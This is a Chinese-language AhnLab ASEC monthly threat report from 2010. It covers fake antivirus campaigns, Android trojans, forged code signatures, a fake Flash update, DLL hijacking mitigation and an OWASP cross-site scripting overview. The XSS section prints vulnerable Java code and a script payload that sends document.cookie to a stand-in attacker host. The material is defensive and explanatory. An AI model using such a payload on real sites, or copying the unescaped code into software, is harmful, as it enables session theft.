Embed Size (px)
Citation preview
2010 ASEC Report Vol.08
安博士公司的安全响应中心(ASEC, AhnLab Secur
ity Emergency Response Center)是以病毒分析师
及安全专家组成的全球性安全响应组织。此报告书
是由安博士公司的ASEC制作,且包含每月发生的主
要安全威胁与响应这些威胁的最新安全技术的简要
信息。
详细内容可以在[www.ahn.com.cn]里确认。
ASEC
2010-09-13
I. 本月安全疫情
1. 病毒趋势…………………………………………………………3
2. 安全趋势…………………………………………………………10
3. 网络安全趋势……………………………………………………17
Ⅰ. 每月安全趋势
1. 病毒趋势
■ 诱导安装虚假杀毒软件的邮件
本月最流行的木马是通过附加到邮件的执行文件或脚本文件来进行传播的虚假杀毒软
件。 邮件格式如下:
[图 1-1] 诱导安装虚假杀毒软件的邮件
脚本文件一般是以加密的形式来附加到邮件,因此很难辨别出其包含的内容。 而且此
类文件是.html 文件格式,用户会很容易中招。如执行该文件,会连接到包含 Windows
帮助文档漏洞的网站。目前发现的此类文件很多会连接成人用品广告网站。 附加到邮
件的可执行文件一般安装以下虚假杀毒软件。
[图 1-2] 虚假杀毒软件
最近通过邮件来进行传播的虚假杀毒软非常流行。 我们认为这些虚假杀毒软件是通过
僵尸网络进行传播的。我们推测通过僵尸网络进行传播的虚假邮件和垃圾邮件会更加
疯狂。 所以如受到此类邮件,直接删除也是一种很好的预防措施。
■ 伪装成正常杀软的虚假杀软
本月发现伪装成正常杀毒软件的虚假杀毒软件。 一旦用户打开网页浏览器,该虚假
杀毒软件会弹出以下警告窗口。可以看到该杀毒软件伪装成有名杀毒软件的界面。
[图 1-3] 伪装正常杀毒软件检测结果的界面
如用户点击‘Apply actions’,会弹出虚假的修复界面。但是实际上不会进行删除或
修复。之后虚假杀毒软件显示如下界面,有些还伪装成有名的在线文件检测网站
Virus total。 其他变种的界面如下:
[图 1-4] 诱导安装虚假杀毒软件的界面
[图 1-4]里标记为 Free Install 的杀毒软件是虚假杀毒软件。
Red Cross
Peak Protection 2010
Pest Detector
Major Defense Kit
Antispysafequard
而且其他杀毒软件的检测结果也是伪装的,希望用户不要被此上当受骗。虚假杀毒软
件逐渐进化,越来越隐蔽地给用户造成损失。如上介绍过,有些虚假杀毒软件还开始
伪装成有名的正常杀毒软件。虽然虚假杀毒软件在安全领域是很老的话题, 但是因受
到金钱的诱惑,病毒制作者会持续精密设计自己的虚假杀毒软件,所以我们继续会关
注此类案件。
■ 智能手机病毒的出现
2010 年 8 月开始发现驻留于基于 Android 平台智能手机的病毒。8月份发现 3种类型
的 基 于 Android 平 台 的 智 能 手 机 。 Android-Trojan/Ewalls
会不经过用户同意泄漏 SIM 等个人敏感信息。制作公司辩解称是为了开发更优秀的软
件而收集信息,但是有些敏感信息是可能会违法。关于该病毒下面会详细解释。
Android-Trojan/SmsSend 是伪装成视频播放器的病毒,实际上并不包含视频播放
功能 。 它的主要功能是不经过用户同意,向收费 SMS(Short Message Service)
发送消息。Android-Trojan/Snake 是伪装成游戏,并泄漏用户的位置信息的木马。
实际具有游戏功能,但是玩游戏时不经过用户同意传送用户的位置信息。本月发现的
智能手机病毒都是运行在 Android 平台上的木马,而且具有不经过用户同意传送个人
信息的功能。用户下载智能手机应用程序并安装以前,必须得明确的确认,而且要仔
细查看以往用户的评价,确认没有恶意因素以后再进行安装。
■ Android 背景界面应用程序里插入的病毒代码
V3 Mobile 产品里诊断为 Android-Spyware/EWalls 的 Android 背景软件里发现泄漏
个人信息的功能。图 1-5 是运行诊断名为 Android-Spyware/EWall 的应用程序时截取
的界面。
[图 1-5] 应用程序运行界面
运行具有信息泄漏功能(图 1-5)的恶意应用程序时会收集用户信息,并通过网络发
送 。 以下图 1-10 是 V3 Mobile 产品里检测为 Android-Spyware/Ewalls 的恶
意应用程序。
[图 1-6] V3 Mobile 产品里检测恶意应用程序时的界面
■ 盗用卡巴电子签名的病毒
最近国外发现盗用电子签名的病毒。7 月份在韩国也发现为了在各大门户网站上进行
传播,伪造某企业电子签名的木马。 但是这次所发现的木马所使用的伪造签名方式,
于以往伪造普通企业签名的手法有所不同,使用的是卡巴斯基的签名。
[图 1-7] 盗用卡巴斯基签名的木马
这次发现的木马所使用的所有卡巴斯基电子签名都过了有效期。所以可以把有效期作
为判断木马的参考。但是如果木马伪造一般企业的电子签名或盗取实际使用在签名里
的密钥时问题会变的很严重。实际上 7 月 19 日所发现的利用 Windows Shell 漏洞的
Stuxnet,其 Rootkit 驱动文件使用某特定企业的加密密钥做了签名。伪装卡巴斯基电
子签名的木马在 V3 产品群里的诊断名如下:
Win-Trojan/Zbot.117736
Win-Trojan/Agent.122856.B
Win-Trojan/Zbot.138216
■ 伪装成虚假 Adobe Flash Player 升级的恶意代码 在 8 月 11 日,发现了从海外制作的虚假 Adobe Flash Player 升级包通过网站传播恶
意代码。本次被发现的虚假 Adobe Flash Player 升级网站是 Adobe 公司为了解决最
新漏洞,发布安全更新时发现的。所以需要大家注意。虚假 Adobe Flash Plyaer 升
级包网站制作成真实的 Adobe Flash Plyaer 升级官网一样,在一般用户的角度上具
有难以判别是不是虚假的特点。
[图 1–8] 虚假 Adobe Flash Player 升级网站
在该虚假网站上点击上面标红色区域块会下载以下如 install_flash_player.exe
(25,088 字节) 的文件。
[图 1–9] 虚假 Adobe Flash Player 升级网站 发布的恶意代码
下载的文件是恶意代码,执行该文件在正常的 svhost.exe 文件的内存领域里注入自身
的代码而且下载安装虚假杀软其它变种恶意代码。
本次被发现的虚假 Adobe Flash Player 升级网站中发布的恶意代码在 V3 产品系列诊
断为如下:
Win-Trojan/Injector.25088.K
有了像这次通过虚假网站发布恶意代码的实例后,升级软件时应当通过该产品直接进
行升级,或通过网站进行升级时,事先确认好网站地址,是不是该产品的官方网站。
需用户谨慎注意。
2. 安全趋势
■ ATM(自动柜员机, AutomatedTeller Machine)漏洞
本次在 BlackHat2010 和 DEFCON18 上 发表了 ATM 存在漏洞的内容。发表者 在现场给
大家演示攻击 ATM 并在画面上显示 JackPot,而且惊人的是在 ATM 机械上出无数的钞
票。
[图 2-1] ATM 攻击试验现场 (图片-wired.com)
攻击类型大致分为 , 利用 ATM 管理功能漏洞远程攻击方法和 ATM 机械自身连接 USB
端口等攻击。在发表中关于自身漏洞上按照技术角度上没有详细的说明但是足以证明
的一点是跟电脑一样同样可以受到攻击的。
[图 2-2] 被攻击的 ATM 状况 (图片-securityweek.com)
幸亏 发表者所发现的漏洞没有应用在所有 ATM 机械上而是指定的机械,该漏洞已经告
诉给 ATM 制作者而且解决此楼哦对那个。但是不仅仅该 ATM 机械,还有其他的 ATM 制
造商也存在同样的问题所以需要关注。
■ DLL Hijacking 漏洞
最近报道最新漏洞信息的网站上有很多关于DLL劫持相关的内容。
应用程序在不指定完全限定路径的情况下动态加载DLL时,Windows将尝试在一组明确
定义的目录中查找此DLL。这组目录称为DLL搜索路径。Windows在目录中找到该DLL后
就会加载该DLL。如果Windows按DLL搜索顺序没有在任何目录中找到DLL,则会在DLL在
家操作返回一个失败结果。
LoadLibrary函数和LoadLibraryEx函数用于动态加载DLL。下面是着两个函数的DLL搜
索顺序。
1. 程序执行目录
2. 系统目录
3. 16位系统目录
4. Windows目录
5. 当前工作目录 (CWD)
6. PATH环境变量中列出的目录
[图 2-3] DLL Hijacking 劫持
利用新引入的 CWDIllegalInDllSearch 注册表项 , 计算机管理员可以修改
LoadLibrary 和 LoadLibraryEx 所使用的 DLL 搜索路径算法的行为。此注册表
项可以允许跳过某些类型的目录。
可以在以下路径中添加 CWDIllegalInDllSearch 注册表项:
将此注册表项用于计算机上的所有应用程序:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
将此注册表项用于计算机上的特定应用程序:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\<application binary name>
每应用程序注册表项始终覆盖系统范围设置。这允许严格设置系统范围设置。然
后,可以为没有正确使用系统范围设置的任何应用程序设置应用程序设置。
例如,管理员可以通过将系统范围的设置设置为 2 来阻止从 WebDAV 和 SMB 加
载 DLL,然后再通过将“图像文件执行选项”设置为 0 或 1 来更改要求此加载
行为的特定应用程序的行为。
CWDIllegalInDllSearch 注册表项的值按如下方式修改 LoadLibrary 和
LoadLibraryEx 的行为
■ 命令窗口游戏平台上运行的恶意代码
在DEFCON18 上发表了能在嵌入式系统运行的恶意代码相关的文章。此发表中,利用命
令窗口游戏机 NDS 和Wili如电脑一样可以麻痹网络 也可以攻击它人的机器,还有非
法下载游戏并运行,导致被感染的用户会受到不小的影响
[图 2-4] 原游戏病毒头
[图 2-5] 恶性代码嵌入的病毒头
还有,在电脑中运行的病毒一样,就像在嵌入式系统中运行自己想添加的代码,通告
在嵌入式系统中发生运行的代码,直接运行已被在Wii运行的病毒感染的游戏。发表者
制作的病毒是攻击home网络的共享器和用户电脑,麻痹网络,使用户电脑成为zommbie
PC来添加到攻击者的Botnets.
[图 2-6] 通过被感染的游戏攻击 home 网络的演示
不仅仅是游戏机,最近国内有使用的 iPhone, Android phone 和同类 smart phone 也
发生类似的事情。所有要注意在网络违法共享的应用程序也会嵌入恶性代码。在这次
发表所主张的一样,从以前的 console 游戏机,在嵌入式系统也会像电脑不仅对自己
同时还会给其他人带来造成极大的影响,违法下载应用程序来使用的时候,由于恶性
代码不仅对嵌入式系统,还会对自己电脑及他人电脑,甚至对网络都会有着很大影
响。
■ Imm32.dll patched 的恶性代码增加
在 8 月末,同样也出现了 patched imm32.dll 的恶性代码以及有着 AV-Killer 功能的
恶性代码。
[图 2-7] patched imm32.dll 的恶性代码周期
2010-08-21 ~ 2010-08-22
http://wow.*******.com/script/movie_ativex_patch.js
http://*******.com/ads.htm
http://*******.com/K.js
http://*******.com/y.exe
2010-08-13 ~ 2010-08-16
http://wow.*******.com/script/movie_ativex_patch.js
http://*******.com/a.htm
http://*******.com/K.js
http:/*******.com/n.exe
[图 2-8] patched imm32.dll 的恶性代码内容
[图 2-9] patched imm32.dll 恶性代码状况(V3Lite 标准)
在[图 2-11]所说明的状况是仅在周末所发生的,到目前为止所奇迹的内容来说,比起
平时 PC 使用量也会增多,被感染的 PC 也没有及时进行升级。通过被攻击的网站蔓延
的恶性代码还会利用 MS10-042 漏洞的示例也会发生,所以用户要对此给予重视并且要
定期进行安全升级。
3. 网络安全动向
■ OWASP 2010 TOP 2
Vol.07 是查看在 Vol.06 里概括查看的 OWASP 2010 Top10。来看一下 OWASP 2010 Top
2 XSS 攻击。
首先 XSS 攻击主要事项看一下下面图片。
[图 3-1] XSS 概括
1) 主要内容
Threat Agents(攻击者) : 包括内,外部用户,管理者。 发送一下无法信赖
的数据。
Attack Vectors(攻击路径) : 攻击者会传送在浏览器可以恶用 interpreter
的以 text 为基础的攻击代码。数据库里的数据和同样的内部代码都会被使用
为攻击路径。
Security Weakness(安全漏洞) : XSS 是广为人知的应用程序安全漏洞。XSS
漏洞是不会对应用程序做适当检查以及限制,用户所提供的数据包含在浏览器
传送的网页时发生的。XSS 是 Stored, Rflected 还有 DOM 基础的 XSS, 3 中
形式。大部分的 XSS 缺点是通过 text 或者代码分析,很容易了解到的。
Technical Impacts(技术影响) : 攻击者是利用用户 session 劫持,网页编
造,恶性 contents 注入,用户重定向,使用恶性代码,利用恶性代码来劫持
用户浏览器等来执行用户浏览器脚本。
Business Impacts(Business 影响) :顾虑受影响的系统和处理的所有数据的
Business 价值。并且也要顾虑漏洞对攻击所造成的影响。
2) 注入攻击例子
这个应用程序会没有检测或限制无法信赖的数据就是用 HTML 的。
(String) page += "<input name='creditcard' type='TEXT‘value='" +
request.getParameter("CC") + "'>";
攻击者是在浏览器修改如下‘CC’变量:
'><script>document.location='http://www.attacker.com/cgi-
bin/cookie.cgi?foo='+document.cookie</script>'.
还要注意攻击者可以利用 XSS 使 CSRF 防御失效。
3) 对应方法
要分离活性浏览器 contents 和无法信赖的数据。
提倡的方法是要限制无法信赖的数据包含的 HTML(body,attribute,javascrip
t,CSS,URL)。在 UI Framework 里不执行限制处理,开发者要在应用程序中包
含限制处理。
适当的正规化与解码来执行正确或者检查white list来保护XSS,但是输入时
会需要特殊文字,所以不是一个完美的对应方法。像这样的情况,在允许输入
前把加密的所有输入进行解密,来检测长度、文字、初始化、数据相关的业
务。
到目前为止,对 OWASP 2010 TOP2 XSS 了解里一下。查看一下 refenrence。
[Reference]
OWASP
•OWASP XSS Prevention Cheat Sheet
•OWASP Cross-Site Scripting Article
•ESAPI Project Home Page
•ESAPI Encoder API
•ASVS: Output Encoding/Escaping Requirements (V6)
•ASVS: Input Validation Requirements (V5)
•Testing Guide: 1st 3 Chapters on Data Validation Testing
•OWASP Code Review Guide: Chapter on XSS Review
External
•CWE Entry 79 on Cross-Site Scripting
•RSnake’sXSS Attack Cheat Sheet
![ASEC Report ASEC Report 5555월월월 - AhnLab, Inc.download.ahnlab.com/asecReport/ASEC_Report_200705.pdf · 2009-01-09 · ASEC Report ASEC Report 5555월월월 ... [그림 1-4]](https://img.pdfslide.tips/doc/110x75/5f2dfaf76488d35fc12c4b7b/asec-report-asec-report-5555-ahnlab-inc-2009-01-09-asec-report-asec.jpg)
